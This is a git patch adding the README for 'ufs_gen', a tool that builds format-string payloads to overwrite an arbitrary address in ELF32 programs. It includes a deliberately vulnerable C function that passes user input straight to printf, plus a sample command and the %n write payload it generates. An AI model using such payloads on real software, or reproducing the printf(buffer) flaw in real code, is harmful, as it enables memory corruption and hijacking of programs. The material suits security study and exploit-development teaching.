From b3122c208b43e8dd775b49c5023f728e14e0156e Mon Sep 17 00:00:00 2001 From: Olivier Gayot Date: Sun, 26 Jan 2014 15:05:01 +0000 Subject: initial commit --- README | 51 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 README (limited to 'README') diff --git a/README b/README new file mode 100644 index 0000000..b2d9679 --- /dev/null +++ b/README @@ -0,0 +1,51 @@ +ufs_gen +======= + +This software allows you to generate a payload which may override an address +with the value of your choice. + +The syntax is quite simple: + +There are three parameters needed for the program to run correctly. + +stackidx: this parameter specifies how many dwords you need to access the +beginning of your buffer (or payload). + +override: the address to override + +with: the value to inject at the address overriden + +This software is intended to work with an ELF32 generated by a typical code. + +example: + +int function(const char *payload) +{ + char buffer[BUFSIZ]; + + strncpy(buffer, payload, sizeof(buffer)); + buffer[sizeof(buffer) - 1] = '\0'; + + printf(buffer); + + return 0; +} + +The support of ELF64 and other formats is intended but not written yet. +Although the option 'addrsize' might already be used to specify if an address +is not 4 bytes long, there is very few chances that it would work correctly. + +The support of printf(payload) directly (i.e. without a temporary buffer) is +also planned. + +Example +======= + +user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 +D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n + +License +======= + +This software is free software covered by the GPL license v2. You should +read the COPYING file to understand what is implied. -- cgit v1.2.3